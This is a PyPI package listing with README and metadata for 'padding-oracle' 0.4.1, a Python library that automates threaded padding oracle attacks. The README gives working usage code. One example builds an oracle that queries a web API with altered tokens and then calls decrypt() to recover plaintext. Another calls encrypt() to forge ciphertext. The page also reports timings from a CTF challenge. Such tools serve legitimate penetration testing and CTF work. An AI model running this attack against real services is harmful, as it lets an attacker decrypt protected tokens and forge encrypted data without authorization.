| Name | padding-oracle JSON |
| Version |
0.4.1
JSON |
| download |
| home_page | |
| Summary | Threaded padding oracle automation. |
| upload_time | 2023-11-18 13:26:18 |
| maintainer | |
| docs_url | None |
| author | |
| requires_python | >=3.10 |
| license | |
| keywords |
|
| VCS |
 |
| bugtrack_url |
|
| requirements |
pytest
cryptography
|
| Travis-CI |
No Travis.
|
| coveralls test coverage |
No coveralls.
|
# Padding Oracle Automation in Python
This script automates padding oracle attacks in Python, offering efficient and threaded execution.
## Installation
You can install the script using one of these methods:
- **Via PyPI:**
```shell
pip3 install -U padding_oracle
```
- **Directly from GitHub:**
```shell
pip3 install -U git+https://github.com/djosix/padding_oracle.py.git
```
## Performance
The script's performance varies depending on the number of request threads. This was tested in a CTF web challenge:
| Request Threads | Time Taken |
|-----------------|-------------|
| 1 | 17m 43s |
| 4 | 5m 23s |
| 16 | 1m 20s |
| 64 | 56s |
## Usage
### Decryption
When trying to decrypt a token like the one at `https://example.com/api/?token=M9I2K9mZxzRUvyMkFRebeQzrCaMta83eAE72lMxzg94%3D`, this script assumes that the token is vulnerable to a padding oracle attack.
```python
from padding_oracle import decrypt, base64_encode, base64_decode
import requests
sess = requests.Session() # Uses connection pooling
url = 'https://example.com/api/'
def oracle(ciphertext: bytes):
response = sess.get(url, params={'token': base64_encode(ciphertext)})
if 'failed' in response.text:
return False # Token decryption failed
elif 'success' in response.text:
return True
else:
raise RuntimeError('Unexpected behavior')
ciphertext = base64_decode('M9I2K9mZxzRUvyMkFRebeQzrCaMta83eAE72lMxzg94=')
assert len(ciphertext) % 16 == 0
plaintext = decrypt(
ciphertext,
block_size=16,
oracle=oracle,
num_threads=16,
)
```
### Encryption
Below is an example demonstrating how to encrypt arbitrary bytes. For a detailed understanding of the process, please refer to [this Pull Request](https://github.com/djosix/padding_oracle.py/pull/4).
```python
from padding_oracle import encrypt
ciphertext = encrypt(
b'YourTextHere',
block_size=16,
oracle=oracle,
num_threads=16,
)
```
### Customized Logging
Both `encrypt` and `decrypt` allow user to inject a custom logger:
- **Disable Logging:**
```python
from padding_oracle import nop_logger
plaintext = decrypt(
...
logger=nop_logger,
)
```
- **Selective Logging:**
```python
def logger(kind: str, message: str):
if kind in ('oracle_error', 'solve_block_error'):
print(f'[{kind}] {message}')
plaintext = decrypt(
...
logger=logger,
)
```
### Extras
The script also includes PHP-like encoding and decoding functions:
```python
from padding_oracle.encoding import urlencode, urldecode, base64_encode, base64_decode
```
### TODO
- [ ] Support more padding schemes
## License
This script is distributed under the MIT license.
Raw data
{
"_id": null,
"home_page": "",
"name": "padding-oracle",
"maintainer": "",
"docs_url": null,
"requires_python": ">=3.10",
"maintainer_email": "",
"keywords": "",
"author": "",
"author_email": "Yuankui Li <toregnerate@gmail.com>",
"download_url": "https://files.pythonhosted.org/packages/46/f4/7e5ee1936f8af70b8368e87da09ba97ed54a2ad6a193f5e6d3ca0e3474f0/padding_oracle-0.4.1.tar.gz",
"platform": null,
"description": "# Padding Oracle Automation in Python\n\n\n\nThis script automates padding oracle attacks in Python, offering efficient and threaded execution.\n\n## Installation\n\nYou can install the script using one of these methods:\n\n- **Via PyPI:**\n ```shell\n pip3 install -U padding_oracle\n ```\n\n- **Directly from GitHub:**\n ```shell\n pip3 install -U git+https://github.com/djosix/padding_oracle.py.git\n ```\n\n## Performance\n\nThe script's performance varies depending on the number of request threads. This was tested in a CTF web challenge:\n\n| Request Threads | Time Taken |\n|-----------------|-------------|\n| 1 | 17m 43s |\n| 4 | 5m 23s |\n| 16 | 1m 20s |\n| 64 | 56s |\n\n## Usage\n\n### Decryption\n\nWhen trying to decrypt a token like the one at `https://example.com/api/?token=M9I2K9mZxzRUvyMkFRebeQzrCaMta83eAE72lMxzg94%3D`, this script assumes that the token is vulnerable to a padding oracle attack.\n\n```python\nfrom padding_oracle import decrypt, base64_encode, base64_decode\nimport requests\n\nsess = requests.Session() # Uses connection pooling\nurl = 'https://example.com/api/'\n\ndef oracle(ciphertext: bytes):\n response = sess.get(url, params={'token': base64_encode(ciphertext)})\n if 'failed' in response.text:\n return False # Token decryption failed\n elif 'success' in response.text:\n return True\n else:\n raise RuntimeError('Unexpected behavior')\n\nciphertext = base64_decode('M9I2K9mZxzRUvyMkFRebeQzrCaMta83eAE72lMxzg94=')\nassert len(ciphertext) % 16 == 0\n\nplaintext = decrypt(\n ciphertext,\n block_size=16,\n oracle=oracle,\n num_threads=16,\n)\n```\n\n### Encryption\n\nBelow is an example demonstrating how to encrypt arbitrary bytes. For a detailed understanding of the process, please refer to [this Pull Request](https://github.com/djosix/padding_oracle.py/pull/4).\n\n```python\nfrom padding_oracle import encrypt\n\nciphertext = encrypt(\n b'YourTextHere', \n block_size=16,\n oracle=oracle,\n num_threads=16,\n)\n```\n\n### Customized Logging\n\nBoth `encrypt` and `decrypt` allow user to inject a custom logger:\n\n- **Disable Logging:**\n ```python\n from padding_oracle import nop_logger\n\n plaintext = decrypt(\n ...\n logger=nop_logger,\n )\n ```\n\n- **Selective Logging:**\n ```python\n def logger(kind: str, message: str):\n if kind in ('oracle_error', 'solve_block_error'):\n print(f'[{kind}] {message}')\n\n plaintext = decrypt(\n ...\n logger=logger,\n )\n ```\n\n### Extras\n\nThe script also includes PHP-like encoding and decoding functions:\n\n```python\nfrom padding_oracle.encoding import urlencode, urldecode, base64_encode, base64_decode\n```\n\n### TODO\n\n- [ ] Support more padding schemes\n\n## License\n\nThis script is distributed under the MIT license.\n",
"bugtrack_url": null,
"license": "",
"summary": "Threaded padding oracle automation.",
"version": "0.4.1",
"project_urls": {
"Bug Tracker": "https://github.com/djosix/padding_oracle.py/issues",
"Homepage": "https://github.com/djosix/padding_oracle.py"
},
"split_keywords": [],
"urls": [
{
"comment_text": "",
"digests": {
"blake2b_256": "21f44dd4b3d49e85f3589aeae071fa3759106b05b7c900c127f1e95e757d3b47",
"md5": "4325e5e170987415fb6419b9472de9b4",
"sha256": "5642b4c016d4d424a7d5970d0c38f4dd7bfcf0cf367d02301083283167dde7fc"
},
"downloads": -1,
"filename": "padding_oracle-0.4.1-py3-none-any.whl",
"has_sig": false,
"md5_digest": "4325e5e170987415fb6419b9472de9b4",
"packagetype": "bdist_wheel",
"python_version": "py3",
"requires_python": ">=3.10",
"size": 10046,
"upload_time": "2023-11-18T13:26:17",
"upload_time_iso_8601": "2023-11-18T13:26:17.074645Z",
"url": "https://files.pythonhosted.org/packages/21/f4/4dd4b3d49e85f3589aeae071fa3759106b05b7c900c127f1e95e757d3b47/padding_oracle-0.4.1-py3-none-any.whl",
"yanked": false,
"yanked_reason": null
},
{
"comment_text": "",
"digests": {
"blake2b_256": "46f47e5ee1936f8af70b8368e87da09ba97ed54a2ad6a193f5e6d3ca0e3474f0",
"md5": "62b77a6b933d96710e78fa51cdac4755",
"sha256": "172ff1ad292d9a9bb779bbc0c24c8c0607e028bd4fa3e8d6b7fead5983dcf6e8"
},
"downloads": -1,
"filename": "padding_oracle-0.4.1.tar.gz",
"has_sig": false,
"md5_digest": "62b77a6b933d96710e78fa51cdac4755",
"packagetype": "sdist",
"python_version": "source",
"requires_python": ">=3.10",
"size": 8471,
"upload_time": "2023-11-18T13:26:18",
"upload_time_iso_8601": "2023-11-18T13:26:18.532055Z",
"url": "https://files.pythonhosted.org/packages/46/f4/7e5ee1936f8af70b8368e87da09ba97ed54a2ad6a193f5e6d3ca0e3474f0/padding_oracle-0.4.1.tar.gz",
"yanked": false,
"yanked_reason": null
}
],
"upload_time": "2023-11-18 13:26:18",
"github": true,
"gitlab": false,
"bitbucket": false,
"codeberg": false,
"github_user": "djosix",
"github_project": "padding_oracle.py",
"travis_ci": false,
"coveralls": false,
"github_actions": true,
"requirements": [
{
"name": "pytest",
"specs": [
[
">=",
"7"
],
[
"<",
"8"
]
]
},
{
"name": "cryptography",
"specs": [
[
">=",
"36"
],
[
"<",
"37"
]
]
}
],
"lcname": "padding-oracle"
}
